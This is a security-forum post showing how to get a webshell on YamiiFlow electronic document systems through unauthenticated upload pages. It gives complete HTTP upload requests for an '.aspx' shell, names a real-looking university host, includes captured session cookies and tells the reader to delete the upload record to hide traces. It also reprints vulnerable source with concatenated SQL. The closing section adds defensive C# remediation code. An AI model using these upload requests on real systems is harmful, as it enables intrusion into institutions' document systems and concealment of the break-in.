YamiiFlow Electronic Official Document System Unauthenticated Upload Getshell - Idea Sharing Community - Web Security - 赤道学院

YamiiFlow Electronic Official Document System: Unauthenticated Upload to Getshell

Location 1:

File location: /yamiiflow/Bulletin/default_doc.asp

Add a Referer (source) header to the request:

Referer: xxxxxxx

Otherwise the page cannot be opened.

Then open https://edoc2.ctbc.edu.tw/Bulletin/edit_doc.asp and click Upload.

Upload request:

POST /Bulletin/edit_doc.asp HTTP/1.1
Host: 
Connection: close
Content-Length: 7640
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJ0kCac27OFBajrbH
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https:// Bulletin/edit_doc.asp
Accept-Language: zh-CN,zh;q=0.9
Cookie: UserName=; UserNo=; username=%E9%99%B3%E8%92%A8%E6%85%A7; UserDName=%E7%A7%98%E6%9B%B8%E5%AE%A4; LoginUID=104013; userno=0004; UserDID=0003; ASPSESSIONIDQGBRASRS=CLFOGDMCDEHKLDLNHBNCLDCN; UserTName=test; 0004%5FMonth=4

------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="isSave"

Y
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="hidIsUse"


------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="hidBulletinID"


------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="Subject"

123456
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="docfile"; filename="New_cmd.aspx"
Content-Type: application/octet-stream

11
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="Use"

0
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="hidPostTime"

111/2/17 16:50:6
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="StartDate"

111/2/17
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="EndDate"

111/2/17
------WebKitFormBoundaryJ0kCac27OFBajrbH--
 

After upload the file is saved at /yamiiflow/download/xxxx.asp (the filename is kept unchanged).

Remember to delete the uploaded record:

POST /Bulletin/IsDelete_doc.asp HTTP/1.1
Host: 
Connection: close
Content-Length: 143
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySTmAFzHdN3XEAxe0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundarySTmAFzHdN3XEAxe0
Content-Disposition: form-data; name="BulletinID"

17
------WebKitFormBoundarySTmAFzHdN3XEAxe0--

Location 2

Access path: /DFmanage/AddImg/ExcelToFolder.aspx

Core source code:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class DFmanage_AddImg_test : System.Web.UI.Page
{
    public class DataItem
    {
        public string DesWord { set; get; }
        public string filename { set; get; }
        public string Ofilename { set; get; }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        string FileNoData = "";
        string Fileupload = "";
        if (!IsPostBack)
        {
            if (Session["list_dataItems"] != null)
            {
                List<DataItem> list_dataItems = (List<DataItem>)Session["list_dataItems"];
                //  Response.Write(list_dataItems[3].filename+","+list_dataItems[3].Ofilename);

                System.Web.HttpFileCollection _file = System.Web.HttpContext.Current.Request.Files;

                if (_file.Count > 0)
                {
                    string IP = "127.0.0.1";
                    string sqlstr = "";
                    for (int i = 0; i < _file.Count; i++)
                    {
                        // file size
                        long size = _file[i].ContentLength;
                        // file type
                        string type = _file[i].ContentType;
                        // file name
                        string name = _file[i].FileName;
                        // file extension
                        string _tp = System.IO.Path.GetExtension(name);

                        string[] filename = name.Split('/');

                        for (int d = 0; d < list_dataItems.Count; d++)
                        {
                            if (filename[1] == (list_dataItems[d].Ofilename + _tp))
                            {
                                // get the file stream
                                System.IO.Stream stream = _file[i].InputStream;
                                // save the file
                                string saveName = list_dataItems[d].filename + _tp;
                                string path = Application["DFFilePath"] + saveName;
                                _file[i].SaveAs(path);

                                sqlstr = @"insert INTO DF.TempIndex.dbo.ImageData(DesNo,Type,attNo,JoinUNo,attFileName,attFilePath,SaveDate,SaveUName) " +
                                    "values('" + list_dataItems[d].DesWord + "','1','" + list_dataItems[d].filename + "','" + Session["UserNo"] + "','" + list_dataItems[d].Ofilename + "','" + IP + "','" + DateTime.Now.ToShortDateString() + "','" + Session["ASPXusername"] + "')";
                                //Label1.Text += "<br />Upload succeeded, filename---- " + fileName;
                                SqlDataSource1.InsertCommand = sqlstr;
                                SqlDataSource1.Insert();
                                //  Response.Write(size + "," + type + "," + filename[1] + "," + filename[0] + "<br/>");
                            }
                        }
                    }
                }
            }
        }
    }

    protected void Button1_Click(object sender, EventArgs e)
    {
        List<DataItem> list_dataItems = new List<DataItem>();
        Label1.Text = "";
        string savePath = (string)Application["DFTempPath"];
        if (FileUpload1.HasFile)
        {
            string filename = FileUpload1.FileName;
            Label1.Text = filename;
            savePath += filename;
            FileUpload1.SaveAs(savePath);
        }

        try
        {
            // create the HSSFWorkbook workbook
            // XSSF: Office 2007 format, HSSF: Office 2003 format
            NPOI.XSSF.UserModel.XSSFWorkbook myWorkbook = new NPOI.XSSF.UserModel.XSSFWorkbook(FileUpload1.FileContent);

            // get the HSSFSheet worksheet
            NPOI.SS.UserModel.ISheet mySheet = myWorkbook.GetSheetAt(0);

            // create a DataTable
            //    System.Data.DataTable myDT = new System.Data.DataTable();

            string[] celldata = new string[3];

            // read every row after the first row of the sheet and store it in the DataTable
            for (int i = mySheet.FirstRowNum + 1; i <= mySheet.LastRowNum; i++)
            {
                NPOI.XSSF.UserModel.XSSFRow row = mySheet.GetRow(i) as NPOI.XSSF.UserModel.XSSFRow;

                for (int j = row.FirstCellNum; j < row.LastCellNum; j++)
                {
                    if (row.GetCell(j) != null)
                    {
                        celldata[j] = row.GetCell(j).ToString();
                    }
                }
                list_dataItems.Add(new DataItem() { DesWord = celldata[0], filename = celldata[1], Ofilename = celldata[2] });
            }

            Session["list_dataItems"] = list_dataItems;

            // release the workbook and worksheet
            myWorkbook = null;
            mySheet = null;
            //  System.Data.DataView myView = new System.Data.DataView(myDT);
        }
        catch (Exception ex)
        {
            Response.Write("thie Error Message---" + ex.ToString());
        }
    }
}

Upload request:

POST /DFmanage/AddImg/ExcelToFolder.aspx HTTP/1.1
Host: edoc.xxxxx.edu.tw
Connection: close
Content-Length: 2430
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTDpsrvPQ3HlkiZbo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://edoc.xxxxxxx.edu.tw/
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
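Both upload paths above share the same shape: the caller is identified only by a Referer header or by cookie values the client writes itself, the stored file keeps the extension and name the client (or the uploaded spreadsheet) chose and lands in a directory IIS serves, and the ExcelToFolder.aspx handler additionally reads the client-supplied Content-Type without using it and builds its INSERT by string concatenation from Session and spreadsheet values. The helper below is an added example written for this page to show the corrected form of that flow; it is not YamiiFlow's code. The table DF.TempIndex.dbo.ImageData with its columns, the Session["UserNo"] key and the Application["DFFilePath"] setting are taken from the source above; the SafeUpload class, its method names, the 10 MB limit and the extension allow-list are assumptions for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Data.SqlClient;
using System.IO;
using System.Web;

// Added example, not the vendor's code. Table/column names, Session["UserNo"] and
// DFFilePath come from the page; everything else here is an assumption.
public static class SafeUpload
{
    // The original handlers accept any extension and keep the client's name, which
    // is what lets a bulletin attachment arrive as New_cmd.aspx under /download/.
    private static readonly HashSet<string> AllowedExtensions =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { ".xlsx", ".jpg", ".png", ".pdf" };

    // Leading bytes each allowed type must start with. Request.Files[i].ContentType
    // is chosen by the client and proves nothing, so the content itself is checked.
    private static readonly Dictionary<string, byte[]> Magic =
        new Dictionary<string, byte[]>(StringComparer.OrdinalIgnoreCase)
        {
            { ".xlsx", new byte[] { 0x50, 0x4B, 0x03, 0x04 } }, // OOXML is a ZIP container
            { ".jpg",  new byte[] { 0xFF, 0xD8, 0xFF } },
            { ".png",  new byte[] { 0x89, 0x50, 0x4E, 0x47 } },
            { ".pdf",  new byte[] { 0x25, 0x50, 0x44, 0x46 } },
        };

    // Returns null when the upload is acceptable, otherwise the reason it is refused.
    public static string Validate(string clientFileName, Stream content, long maxBytes)
    {
        if (string.IsNullOrEmpty(clientFileName)) return "missing filename";

        // Path.GetFileName discards any directory part the client sent, so neither
        // "..\" segments nor the '/'-split in the original code influence the result.
        string name = Path.GetFileName(clientFileName);
        string ext = Path.GetExtension(name);
        if (string.IsNullOrEmpty(ext) || !AllowedExtensions.Contains(ext))
            return "extension not allowed";
        if (content.Length == 0 || content.Length > maxBytes)
            return "size out of range";

        byte[] expected = Magic[ext];
        byte[] head = new byte[expected.Length];
        content.Position = 0;
        int read = content.Read(head, 0, head.Length);
        content.Position = 0;
        if (read < expected.Length) return "file too short";
        for (int i = 0; i < expected.Length; i++)
            if (head[i] != expected[i]) return "content does not match extension";
        return null;
    }

    // The server picks the on-disk name; the client's name survives only as metadata.
    public static string StorageName(string clientFileName)
    {
        string ext = Path.GetExtension(Path.GetFileName(clientFileName)).ToLowerInvariant();
        return Guid.NewGuid().ToString("N") + ext;
    }

    // Parameterized form of the INSERT that the original builds by concatenation.
    public static void RecordUpload(SqlConnection conn, string desNo, string storedName,
                                    string userNo, string originalName, string savePath, string userName)
    {
        const string sql =
            "INSERT INTO DF.TempIndex.dbo.ImageData " +
            "(DesNo,Type,attNo,JoinUNo,attFileName,attFilePath,SaveDate,SaveUName) " +
            "VALUES (@desNo,'1',@attNo,@joinUNo,@attFileName,@attFilePath,@saveDate,@saveUName)";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.AddWithValue("@desNo", desNo);
            cmd.Parameters.AddWithValue("@attNo", storedName);
            cmd.Parameters.AddWithValue("@joinUNo", userNo);
            cmd.Parameters.AddWithValue("@attFileName", originalName);
            cmd.Parameters.AddWithValue("@attFilePath", savePath);
            cmd.Parameters.AddWithValue("@saveDate", DateTime.Now.ToShortDateString());
            cmd.Parameters.AddWithValue("@saveUName", userName);
            cmd.ExecuteNonQuery();
        }
    }

    // Entry point for the Page_Load branch: authorization comes from server-side
    // session state, never from a Referer header or a cookie value the client fills in.
    public static string HandlePostedFile(HttpContext ctx, HttpPostedFile file, string storageDir)
    {
        if (ctx.Session == null || ctx.Session["UserNo"] == null)
            throw new HttpException(401, "login required");

        string problem = Validate(file.FileName, file.InputStream, 10L * 1024 * 1024);
        if (problem != null)
            throw new HttpException(400, problem);

        // storageDir should be a directory IIS does not serve (or one with script
        // handlers removed); /yamiiflow/download/ is reachable by URL, which is why
        // an uploaded .asp/.aspx there runs.
        string stored = StorageName(file.FileName);
        file.SaveAs(Path.Combine(storageDir, stored));
        return stored;
    }
}
```

In the ASPX page this replaces the body of the `_file.Count > 0` loop: call `SafeUpload.HandlePostedFile(HttpContext.Current, _file[i], storageDir)` and pass the returned name to `RecordUpload` instead of assigning `SqlDataSource1.InsertCommand`. The same three controls (server-side login state, extension and content allow-list, server-chosen name outside the web root) are what the classic-ASP edit_doc.asp path in Location 1 lacks.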